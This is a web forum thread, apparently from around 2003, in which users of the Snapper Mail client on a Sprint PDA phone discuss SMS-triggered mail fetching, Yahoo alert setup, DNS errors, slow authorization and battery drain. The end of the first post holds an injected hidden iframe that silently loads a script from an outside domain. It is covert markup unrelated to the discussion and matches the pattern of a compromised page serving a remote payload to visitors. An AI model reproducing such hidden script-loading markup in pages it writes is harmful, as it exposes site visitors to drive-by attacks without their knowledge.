+ Reply to Thread

Lightbulb I wish Snapper Mail could do this...

I currently have my yahoo & hotmail alerts setup to send my mobile phone a text message when I receive new email. The notification arrives on my phone in the form of a one-way text message (i.e., my#@messaging.sprintpcs.com). I was thinking it would be cool if Snapper mail could intercept these notifications, much the same way PDA Apps intercepts SMS notifications, and did a fetch for new mail to the applicable account. This would be much better than setting up the auto send/fetch feature already available in Snapper Mail, because it would only fetch when new mail arrives.

Does anyone else see a benefit in this and did I explain it well enough that the folks over at Snapper Mail would understand what it is I'm after? I was thinking of submitting it as a feature enhancement request.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Sounds like a good idea, but would that effect normal messages? What I mean is, would the message be a special one that only Snapper mail understood? Otherwise, every time you get any message Snapper would check your mail (not a big deal, but while it is checking, you are not getting your calls.)

I haven't really figured out the whole 2 way messaging yet. I can receive messages all day long, and if there is a # attached I can call "talk" to reply, but so far the only option for sending messages is I500SMS and I've been having problems with that (will contact pdaapps instead of posting.) I just find it hard to believe that there is no way to send a message from the phone itself.

Originally posted by Toyz
    Sounds like a good idea, but would that effect normal messages? What I mean is, would the message be a special one that only Snapper mail understood?

The "From:" address in the one-way text message is unique to the provider sending the alert. Snapper Mail could read this value and know that it needs to login to your Yahoo account and fetch new mail.
    Otherwise, every time you get any message Snapper would check your mail (not a big deal, but while it is checking, you are not getting your calls.)
    You would miss calls when Snapper checks. However in this case Snapper would only check when there are new messages vs. the manual fetch required today. Also if you currently have Snapper setup to check at specified intervals, it's already tying up the phone & it might not even find any new messages to download. The one whole in my idea is the fact that not all mail providers provide an alert service.

I haven't really figured out the whole 2 way messaging yet. I can receive messages all day long, and if there is a # attached I can call "talk" to reply, but so far the only option for sending messages is I500SMS and I've been having problems with that (will contact pdaapps instead of posting.) I just find it hard to believe that there is no way to send a message from the phone itself.
    Yep, that's the way Sprint has been from day one. I've been pretty successful with the PDA Apps program. I hope they can solve your specific problem.

~Kimberly

ANYONE ELSE EXPERIENCING THIS PROBLEM?

7 OUT OF 10 of my automatic fetches end in an error that says "DNS server address is not setup properly", however I rarely have stalls when I manually fetch and a few of my automatic fetches DO go thru, so I can't imagine that I have anything set up wrong.

I have a question in to Snappermail, but I was just wondering if this is the norm?????

Kimberly
    Don't shake my tree if you don't like my peaches!!!

Cool Re: ANYONE ELSE EXPERIENCING THIS PROBLEM?

Originally posted by nchargreed
    7 OUT OF 10 of my automatic fetches end in an error that says "DNS server address is not setup properly", however I rarely have stalls when I manually fetch and a few of my automatic fetches DO go thru, so I can't imagine that I have anything set up wrong.

I have a question in to Snappermail, but I was just wondering if this is the norm?????

Kimberly
    Not my experience... Mine only complains when it can't find a vision connection (frequent). But I auto check every 20 minutes. And it works pretty much all the time.

Chris

~Kimberly

Re: Re: ANYONE ELSE EXPERIENCING THIS PROBLEM?

Originally posted by cafroman
    Not my experience... Mine only complains when it can't find a vision connection (frequent). But I auto check every 20 minutes. And it works pretty much all the time.

Chris
    Well, mine was singin' the blues! After contacting Snappermail support, found out that they have had a few people reporting the same thing, something to do with the "device network library". They are looking into it but as a workaround they suggested I used the numeric IP address in place of the Pop.sprintpcs.com.

So far its working like a charm. Most all auto fetches are going thru.

Kimberly
    Don't shake my tree if you don't like my peaches!!!

Re: I wish Snapper Mail could do this...

Originally posted by 8notime
    I currently have my yahoo & hotmail alerts setup to send my mobile phone a text message when I receive new email. The notification arrives on my phone in the form of a one-way text message (i.e., my#@messaging.sprintpcs.com). I was thinking it would be cool if Snapper mail could intercept these notifications, much the same way PDA Apps intercepts SMS notifications, and did a fetch for new mail to the applicable account. This would be much better than setting up the auto send/fetch feature already available in Snapper Mail, because it would only fetch when new mail arrives.

Does anyone else see a benefit in this and did I explain it well enough that the folks over at Snapper Mail would understand what it is I'm after? I was thinking of submitting it as a feature enhancement request.
    There is an application that does exactly what you describe, but which ony works on the Treo series and is thus called TreoHelper. I have my yahoo mail setup to send me SMS's whenever I have new messages, whereby Treohelper recognizes the SMS through defined "trigger text" and then automatically launches Snappermail (or GNUGotMail) to download the mail. What you are referring to and what is described above is referred to as SMS triggerred Pull email functionality as opposed to traditionaly "push" mail functionality found in devices like the BB. The developer has a whole thread on this app here at Treocentral. I would recommend that you ask him if he would be interested in porting the applicaiton to the i500 as well.

Furthermore there have been inumerable other sms tiggered options that have been discussed ad nauseum on treocentral including those pertaining to Chatter and etc. The forums over there are a great resource and I would recommend doing a search for a topic that has already been discussed with a wealth of info already present...

Re: Re: I wish Snapper Mail could do this...

Great information. Thank you! I will read through the links you provided. You got me thinking though (uh oh), i500SMS is already doing something similar where it triggers the app to connect to their proxy server to fetch new messages. I'll ping them to see if this would be a reasonable addition to their program. I hate to bug them too much, I'm already a pain in their butt... lol

Originally posted by gfunkmagic
    There is an application that does exactly what you describe, but which ony works on the Treo series and is thus called TreoHelper. I have my yahoo mail setup to send me SMS's whenever I have new messages, whereby Treohelper recognizes the SMS through defined "trigger text" and then automatically launches Snappermail (or GNUGotMail) to download the mail. What you are referring to and what is described above is referred to as SMS triggerred Pull email functionality as opposed to traditionaly "push" mail functionality found in devices like the BB. The developer has a whole thread on this app here at Treocentral. I would recommend that you ask him if he would be interested in porting the applicaiton to the i500 as well.

Furthermore there have been inumerable other sms tiggered options that have been discussed ad nauseum on treocentral including those pertaining to Chatter and etc. The forums over there are a great resource and I would recommend doing a search for a topic that has already been discussed with a wealth of info already present...

Re: I wish Snapper Mail could do this...

Originally posted by 8notime
    I currently have my yahoo & hotmail alerts setup to send my mobile phone a text message when I receive new email. The notification arrives on my phone in the form of a one-way text message (i.e., my#@messaging.sprintpcs.com).
    Out of curiousity... how did you set that up? I looked around my yahoo options and couldn't seem to find it.
    Last edited by cincnorad; 10-15-2003 at 06:50 PM.

Re: Re: I wish Snapper Mail could do this...

Originally posted by cincnorad
    Out of curiousity... how did you set that up? I looked around my yahoo options and couldn't seem to find it.
    First you need to go to mobile.yahoo.com and register your mobile device (SPCS phone).

Next go to mail.yahoo.com and go to options>filters. Here you can create a rule that says to notify your mobile on incoming mail.

I did this by saying "if the from fields has an @", then notify my mobile phone.

Thanks

Thanks for the tip. I like how SMS sends the first part of the e-mail as well... saves the trouble of logging in and checking it most of the time.

I went ahead and purchased Snappermail last night -- and I agree... I wish Snappermail had this feature. The fetching feature kills the battery, and lacks the instantaneous notification that the SMS feature gives you.

Sorry to post after myself... but has anyone else had probs with Snappermail being really slow? I just purchased it last night, played around with it all today. I noticed that after it logs into the PCS network the app just hangs for literally 2 minutes on the "AUTHORIZING XUSERX" screen before actually downloading e-mails. Is this normal? This doesn't seem to happen when accessing the web.

Personally I dont see the functionality of receiving a text message that you have email, I think it would be MUCH better if you just received the darn email on your phone. Kind of reminds me of Sprint shortmail.

Hopefully someone will write a good push email program that sends youre entire, not cutoff, email to your phone as soon as you receive it, including hotmail and pop.

Jayhawks Rule

battery problem

Snapper mail works great for me but if I set it to auto fetch mail it drains the battery very quickly. Anyone else have this problem. Is there possibly a setting I need to change? any help would be appreciated

it is slow

The newer snappermail versions tend to be a lot slower, I was using 1.71 or 1.73 I forget, now I'm using 1.84 and i find it a lot slower. It has to do that damn authorizing and connecting thing, which it never seemed to do before. And the worst is if its downloading a message I don't want and I hit skip, it disconnects and reconnects and then re-authorizes. I think i'll go back to the older version.

It's quite frustrating -- I agree. Glad to know I'm not the only one experiencing this problem. Let me know if reinstalling the older version fixes it.